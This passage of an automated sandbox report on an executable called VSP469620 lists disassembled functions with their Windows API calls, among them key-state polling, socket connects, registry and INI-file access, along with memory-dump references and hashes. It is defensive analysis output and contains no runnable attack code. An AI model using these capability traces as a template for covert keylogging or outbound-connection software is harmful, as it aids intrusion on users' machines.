                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B12FAE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: 5f5fe7f350dafa76d3496554831efea2272677ec0182c6c8ae19a35e31f3456c
                                                              • Instruction ID: 469eb995e42c14eeb2eb10ebaadfccae26c663410afa423bb3936c6949068c68
                                                              • Opcode Fuzzy Hash: 5f5fe7f350dafa76d3496554831efea2272677ec0182c6c8ae19a35e31f3456c
                                                              • Instruction Fuzzy Hash: F7517632208204AFD704EF64C991EAEB7F8FF88714F40885DF595872A2EB30E955CB52
                                                              Function 00B1CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b093c0d30e2ab2eaf04aabe77a8e9da97d9f783463022106501baee4afab5daf
                                                              • Instruction ID: 15bdb350d4b23032e5ffe12a93fb9cbd9f5db33545d28c8c0ee37462036dacdb
                                                              • Opcode Fuzzy Hash: b093c0d30e2ab2eaf04aabe77a8e9da97d9f783463022106501baee4afab5daf
                                                              • Instruction Fuzzy Hash: 7041B43A940244ABC710DF78DC84FE9BFE8EB09310F9402B5F959A72E1CB30AD91DA50
                                                              Function 00B01206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B012B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B012DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0131C
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B01341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B01349
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 89c109151d52e63fec18db3179d0fc0826360379637576e11a796683b891d292
                                                              • Instruction ID: 2d816b29cae719942b594a3e3c9753a3a187f3a7040ca9e25e0267772663077c
                                                              • Opcode Fuzzy Hash: 89c109151d52e63fec18db3179d0fc0826360379637576e11a796683b891d292
                                                              • Instruction Fuzzy Hash: 71410D35600105DFCF05EF64CA91AAEBBF9FF08310B148099E90AAB3A2DB31ED41DB51
                                                              Function 00ACB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(000000FF), ref: 00ACB64F
                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00ACB691
                                                              • GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: 2f6677bbc79afec870c077e3ab77423ae6295e6e628133ea00b3e860836806cc
                                                              • Instruction ID: a9c62a103fabefddd02c12ee174fb581b5013ca28fea13892638690e45873ecb
                                                              • Opcode Fuzzy Hash: 2f6677bbc79afec870c077e3ab77423ae6295e6e628133ea00b3e860836806cc
                                                              • Instruction Fuzzy Hash: E5416B35604119FBCF159F64C945FE9BBB4FB05324F20435AF82996290CB31A994DFA1
                                                              Function 00AEB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00AEB369
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00AEB413
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AEB41B
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00AEB429
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AEB431
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: fe3ae030defdab687c0e4da31ef6537a1a22fb2560f6542b4ae6e02164f72098
                                                              • Instruction ID: 44bee536b3933e5ec0ca4289250bf03ddfa29adffa372f15db6c0ffa07e25135
                                                              • Opcode Fuzzy Hash: fe3ae030defdab687c0e4da31ef6537a1a22fb2560f6542b4ae6e02164f72098
                                                              • Instruction Fuzzy Hash: BE31CE7190025AEBDF04CF69D94EADF3BB5EB04315F104229F921AB1D1C7B0D914CBA0
                                                              Function 00AEDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00AEDBD7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AEDBF4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AEDC2C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AEDC52
                                                              • _wcsstr.LIBCMT ref: 00AEDC5C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: 305ca139cf785321fc6cf4c4f3b8ec5c3ac381bcaf6f382c0ea5c6501714b898
                                                              • Instruction ID: 68abf734d11efa5e790006702ac0b77b1cd5bb68bb472151d8d3e10c8e31e009
                                                              • Opcode Fuzzy Hash: 305ca139cf785321fc6cf4c4f3b8ec5c3ac381bcaf6f382c0ea5c6501714b898
                                                              • Instruction Fuzzy Hash: 9321F971204144BFEB155F3AED49E7F7BA9DF85790F20403AF909DA191EEA1DC41D260
                                                              Function 00B1DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B1DEB0
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B1DED4
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B1DEEC
                                                              • GetSystemMetrics.USER32(00000004), ref: 00B1DF14
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00B03A1E,00000000), ref: 00B1DF32
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: 6cac80c3aa9de57676e5dc2005099c82129480304a9aa9d18e4bd089bf8156cf
                                                              • Instruction ID: ea15a261450c9ccb739f2fad0acee0f082175aae4d9c045e25427c877c0e80c9
                                                              • Opcode Fuzzy Hash: 6cac80c3aa9de57676e5dc2005099c82129480304a9aa9d18e4bd089bf8156cf
                                                              • Instruction Fuzzy Hash: 8721A472611216AFCF204F7C9C84BAA37D4FB15725F650764F926CB5E0DB309991CB90
                                                              Function 00AEBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AEBC90
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AEBCC2
                                                              • __itow.LIBCMT ref: 00AEBCDA
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AEBD00
                                                              • __itow.LIBCMT ref: 00AEBD11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 6a09a45d47b7f5f3d812a215610816f994672ddc108828e02b583ebeab595e4f
                                                              • Instruction ID: 29fdbf5b9a519798619687c0c68251ce3d9db9b08a9f6f7ea1c32caffde2592e
                                                              • Opcode Fuzzy Hash: 6a09a45d47b7f5f3d812a215610816f994672ddc108828e02b583ebeab595e4f
                                                              • Instruction Fuzzy Hash: F221C335610648BADB10AF6A9D8AFDF7AA8AF89750F100025F906EB182DB74CD0587B1
                                                              Function 00AF6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB50E6: _wcsncpy.LIBCMT ref: 00AB50FA
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,00AF60C3), ref: 00AF6369
                                                              • GetLastError.KERNEL32(?,?,?,00AF60C3), ref: 00AF6374
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AF60C3), ref: 00AF6388
                                                              • _wcsrchr.LIBCMT ref: 00AF63AA
                                                                • Part of subcall function 00AF6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00AF60C3), ref: 00AF63E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                              • String ID:
                                                              • API String ID: 3633006590-0
                                                              • Opcode ID: a2e9ae0668eb2d9a84f7c9dea7e9739935b2179349d45a6a97a6405f076c9b74
                                                              • Instruction ID: 7cacb66857bfdaf2ed4a54a88073ec0b97a9e95de07a0825a51602f4121bb319
                                                              • Opcode Fuzzy Hash: a2e9ae0668eb2d9a84f7c9dea7e9739935b2179349d45a6a97a6405f076c9b74
                                                              • Instruction Fuzzy Hash: 9A21EB3190461D5BDF15ABB8AD42FFE336CEF19360F20056AF245DB1C1EF60D9848A55
                                                              Function 00B08B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B0A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B08BD3
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08BE2
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00B08BFE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 3701255441-0
                                                              • Opcode ID: aa1f2d0dd48948c14bce6c155450c120c90dc3b02ed1c368de47a28d49128cd9
                                                              • Instruction ID: ba5f834d98fd955edbaa04577714b8012752e7d85bb27ca317dac0160549181f
                                                              • Opcode Fuzzy Hash: aa1f2d0dd48948c14bce6c155450c120c90dc3b02ed1c368de47a28d49128cd9
                                                              • Instruction Fuzzy Hash: 6A215E312042149FDB10AF68DA85F7E7BE9EF48720F14845DF956AB2D2CF74AD018B51
                                                              Function 00B08420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00B08441
                                                              • GetForegroundWindow.USER32 ref: 00B08458
                                                              • GetDC.USER32(00000000), ref: 00B08494
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00B084A0
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00B084DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: 6628be2c7b74bce54d375ea66b18bce681c17250ff9afab4fd23fbd17e9d998a
                                                              • Instruction ID: aea90421d959c6ba3676f35a89cf1d3f3227edd7452f38d35e2528842effb6fb
                                                              • Opcode Fuzzy Hash: 6628be2c7b74bce54d375ea66b18bce681c17250ff9afab4fd23fbd17e9d998a
                                                              • Instruction Fuzzy Hash: BE214F75A00204AFD700DFA4D985AAEBBF9EF48341F148479F95A97352DE74AD00CB60
                                                              Function 00ACAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
                                                              • SelectObject.GDI32(?,00000000), ref: 00ACAFF2
                                                              • BeginPath.GDI32(?), ref: 00ACB009
                                                              • SelectObject.GDI32(?,00000000), ref: 00ACB033
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 8cab5d6a0a28864077c1485744d115fa11fc095069885f2d311972748aaf6260
                                                              • Instruction ID: 3e5ae14ef1f0e2055bc74006098021ddef4a3615f8db22e4cfeca709d1a7d76e
                                                              • Opcode Fuzzy Hash: 8cab5d6a0a28864077c1485744d115fa11fc095069885f2d311972748aaf6260
                                                              • Instruction Fuzzy Hash: C621AFB0810209EFDB10DF6DEC49BAA7B78BB20355F14461EE429A70A0CB718995DBA0
                                                              Function 00AD217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __calloc_crt.LIBCMT ref: 00AD21A9
                                                              • CreateThread.KERNEL32(?,?,00AD22DF,00000000,?,?), ref: 00AD21ED
                                                              • GetLastError.KERNEL32 ref: 00AD21F7
                                                              • _free.LIBCMT ref: 00AD2200
                                                              • __dosmaperr.LIBCMT ref: 00AD220B
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 2664167353-0
                                                              • Opcode ID: 8359dc8456f1610304e010fb005034878108776c4a4269542be3575aebb177d9
                                                              • Instruction ID: dce9ebd51f88a62940e51c428f09d3db930a3f7ec9d41c609ed57faefadbbe9e
                                                              • Opcode Fuzzy Hash: 8359dc8456f1610304e010fb005034878108776c4a4269542be3575aebb177d9
                                                              • Instruction Fuzzy Hash: 4A110433104306AF9B15AFA5ED42EAF3BA8EF50770B10052BF91687391EB31C811C7A0
                                                              Function 00AEABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                              • GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 87122b1fad8e7eead9f9f1db3bba2bd73560d47ea87dcd6c3490e393a316dcef
                                                              • Instruction ID: a08a1ccf319a6bee565df5a424be837ea8b2424a3e9d39fded7e40ce385fb4fa
                                                              • Opcode Fuzzy Hash: 87122b1fad8e7eead9f9f1db3bba2bd73560d47ea87dcd6c3490e393a316dcef
                                                              • Instruction Fuzzy Hash: E6013C71200244BFDB105FAAEC49DAB3BBDEF9A7557200429F945D3260DA71DC50DB61
                                                              Function 00AE9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00AE9ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00AE9AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00AE9B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AE9B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00AE9B21
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: 98d4a2134bdfd04c116c4ee6fdd9ff3fb002da370d111d3acbe3033f7a7ac847
                                                              • Instruction ID: b809cf742fac7b760641ee932a179f5d60e744c7cba0ddbe1da397e1421901da
                                                              • Opcode Fuzzy Hash: 98d4a2134bdfd04c116c4ee6fdd9ff3fb002da370d111d3acbe3033f7a7ac847
                                                              • Instruction Fuzzy Hash: 59012876600219BBDB114F6AED44AAEBAADEB44792F248424F905D3210DB74ED409BA0
                                                              Function 00AF7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AF7A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AF7A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Memory Dump Source
